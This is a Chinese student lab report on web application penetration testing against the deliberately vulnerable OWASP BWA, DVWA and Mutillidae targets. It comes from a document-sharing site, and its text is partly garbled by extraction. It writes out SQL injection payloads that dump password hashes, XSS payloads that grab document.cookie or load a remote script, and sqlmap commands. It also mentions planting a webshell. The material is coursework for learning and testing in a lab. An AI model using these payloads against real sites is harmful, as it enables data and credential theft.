实验3Web应用程序渗透测试.docx
《实验3Web应用程序渗透测试.docx》由会员分享,可在线阅读,更多相关《实验3Web应用程序渗透测试.docx(20页珍藏版)》请在淘文阁 - 分享文档赚钱的网站上搜索。
1、实验实验 3 Web 应用程序渗透测试应用程序渗透测试实验时间:2014/10/29实验地点:实验室 1428;一、实验目的一、实验目的1.学习使用 OWASP BWA 靶机。2.学习使用 Kali Linux 进行 Web 应用程序渗透测试。二、实验内容二、实验内容1.使用 w3af 漏洞扫描器对 OWASP BWA 靶机进行漏洞扫描。2.根据老师的课堂讲授,按照课件相关内容在OWASP BWA靶机上实践XSS和SQL注入两种攻击。3.配合使用 Tamper Data 和 sqlmap 进行 sql 注入攻击。4.利用文件上传漏洞植入 Webshell。三、三、主要主要实验结果(请截屏)实验
2、结果(请截屏)(一)使用(一)使用 w3af 漏洞扫描器对漏洞扫描器对 OWASPBWA 靶机进行漏洞扫描靶机进行漏洞扫描1.如图启动 w3af 漏洞扫描器。2.编辑新建的 Profile,也就是配置各种插件。对 audit 类插件勾选 sqli 和 xss 两个插件,如下图:对 crawl 类插件只勾选 web_spider,如下图对 web_spider 的配置在窗口右侧,勾选 only_forward 并保存,如下图对 output 类插件,只勾选输出 html 文件。对输出文件的配置在窗口右侧,如下图输入文件名称并保存。这样扫描结果将保存在/root/dvwa.html 文件中。4.如
3、下图在 Target 一栏输入扫描的网址,单击右侧按钮 start 启动扫描。扫描过程中扫描结果(二)(二)在在 OWASPBWA 靶机上实践靶机上实践 XSS 和和 SQL 注入两种攻击注入两种攻击1.在 Kali Linux 攻击主机上,按照课件第 29 页,实践“通过 SQL 注入攻击绕过身份认证机制”。2.XSS 和 SQL 注入攻击(1)在攻击机上访问 http:/ 1.的攻击方法,登录进入 DVWA 训练系统。(2)首先按照图示将 DVWA 应用的安全等级设置为 Low。(3)按照课件 29-31 页,实践 SQL 注入攻击。使用 OWASP BWA 靶机的 DVWA 应用程序演示
4、如何获取后台数据库更多的信息。输入文件“XSS&SQLi.txt”中的脚本。将数据表中的每一行都显示出来,输入:or 1=1查 询 INFORMATION_SCHEMA 系 统 表,输 入:UNION SELECT 1,table_name fromINFORMATION_SCHEMA.tables-列 出user表 的 内 容,输 入:UNIONSELECT1,column_namefromINFORMATION_SCHEMA.columns where table_name=users-取得口令的 MD5 值,输入:UNION SELECT NULL,password from users
5、-使用 concat()函数将所有的信息都列出来,输入:UNION SELECT password,concat(first_name,last_name,user)from users-(4)按照课件第 40 页,实践反射式 XSS 攻击。输入 alert(Have funs)输入alert(document.cookie)(5)按照课件第 43 页,访问 http:/ mutilidae 训练系统,实践存储式 XSS 攻击。访问 Mutillidae 的 Cross Site Scripting(XSS)输入:xss.js 的内容如下:document.write(This is remo
6、te text via xss.js located at ha.ckers.org +document.cookie);alert(This is remote text via xss.js located at ha.ckers.org +document.cookie);首先按照 sql 注入攻击登录进入 mutilidae 训练系统输入:document.write(This is remote text via xss.js located at ha.ckers.org +document.cookie);alert(This is remote text via xss.js
7、located at ha.ckers.org +document.cookie);(三)配合使用(三)配合使用 Tamper Data 和和 sqlmap 进行进行 sql 注入攻击注入攻击重复(二)中步骤 2-(1)和 2-(2)。启动 Tamper Data 插件。4.按照课件 33 页使用 Sqlmap 进行 SQL 注入攻击。(1)扫描,输入:sqlmap-u http:/10.10.10.129/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#-cookie=Tamper Data 插件抓取的内容(2)获取数据库名,输入:sqlmap-
8、u http:/10.10.10.129/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#-cookie=Tamper Data插件抓取的内容-dbs-v 0(3)获取 dvwa 数据库中存在的表名,输入:sqlmap-u http:/10.10.10.129/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#-cookie=Tamper Data插件抓取的内容-D dvwa-tables(4)获取 users 表中的字段列表,输入:sqlmap-u http:/10.10.10.129/dvwa/vul
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 实验 Web 应用程序 渗透 测试
限制150内